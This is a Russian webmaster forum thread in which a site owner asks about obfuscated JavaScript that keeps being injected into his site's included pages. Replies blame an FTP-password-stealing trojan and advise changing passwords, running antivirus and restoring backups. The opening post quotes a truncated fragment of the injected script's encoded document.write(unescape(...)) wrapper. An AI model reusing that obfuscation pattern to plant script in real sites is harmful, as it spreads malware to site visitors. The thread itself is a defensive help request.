Вирус в виде яваскрипта

sozon
На сайте с 04.09.2006
Offline
90
669

У меня на сайте постоянно появляется вирус, в виде ясваскрипта

Вот его код:


<!-- 148504c174d6458f248aca35d7074b42 --><script>document.write(unescape("%3Cscript%3Efunction%20w8z7nl%28pbvkae%29%7Bvar% ...... тута еще куча яваскрипт кода (не влезло в сообщение) .......... "))</script><!--/--><p>

Причем вставляется он очень грамотно, т.е. не тупо во все страницы, а в страницы, которые потом инклудятся (header, footer и т.д.)

Есть много сайтов, тоже больных этим http://www.yandex.ru/yandsearch?text=document.write%28unescape%28&rpt=rad

Подскажите плиз что это такое, может кто встречал подобное.

Master812
На сайте с 23.12.2007
Offline
168
#1

sozon, у меня такое же было совсем недавно. Пришлось снести CMS, но форум удалось спасти.

raspberry pi сайт ( https://4raspberrypi.ru/ ) и orange pi сайт ( https://orangepi.su/ ) и новостной движок ( https://generalscript.ru/ )
ooprizrakoo
На сайте с 28.11.2006
Offline
67
#2

Вариант 1: кросс-сайт скриптинг. Дыра в пхп/мускуле

Вариант 2: у вас на компе - троянчик. Который себя дописывает в эти страницы при заливке их по фтп.

Сайт «Курт Воннегут по-русски» (http://vonnegut.ru)
Light Phantom
На сайте с 17.03.2007
Offline
188
#3

Старая тема уже. Сам "переболел" однажды.

Почистите компьютер от вирусов, почистите файлы от вирусов, смените пароли от фтп и желательно не сохранять пароли в фтп-клиентах.

Вот тут посмотрите похожие проблемы

W
На сайте с 19.06.2006
Offline
142
#4

99% - сохранен пароль в TC, CuteFTP :)

J0
На сайте с 13.05.2007
Offline
39
#5

ТС, работайте через SSH! http://www.google.ru/search?q=ssh

Зарабатываю тут (http://www.setlinks.ru/?pid=17004).
DyaDya
На сайте с 11.04.2007
Offline
147
#6

Уже многое сказано. Болезнь известная. Сайт часто можно починить. Невсегда к счастью сайт уничтожается. Ибо вредителям, наоборот, нужно, чтобы сайт продолжал работать и заражать других.

1. Меняйте срочно все пароли: фтп, почту, аську и т.п. Особенно те, что хранили на компе.

2. Проверяйтесь антивирусом, плюс есть неплохая утилитка: AVZ , ей тоже пройдитесь.

3. Сделайте на всякий случай дамп сайта и потом...

4. Лечите сайт, на форуме выкладывали средство, помогающее удалить все включения вредного кода на сайте.

Если дамп рабочий уже есть, то можете его восстановить...

Как они достали - эти вирусы!

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
sozon
На сайте с 04.09.2006
Offline
90
#7

Да, спасибо всем.

У меня и раньше уже была такая проблема, в инете вычитал, что троян тырит пароль от ftp из тотала (если он сохранен). После этого я сменил пароль от сайта, отменил сохранение пароля в тотале. Думал, что все, справился уже, но вот опять началось! Значит он умеет и перехватывать пароль при ручном вводе.

Для друзей по несчастью утилитка, про которую говорилось на форуме называется haxfix. Еще говорят что Nod тоже видит эту заразу. Каспер скорее всего тоже.

sozon добавил 25.02.2008 в 22:09

Гугл еще зараза такая забраковал мой сайт. Говорит там вирусы видите ли там.

Говорит удалите вирусы и сделайте запрос на повторное сканирование. Удалил, сделал запрос, но он все равно говорит "вирусы у тебя". Ну да ладно, это уже другая история....

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий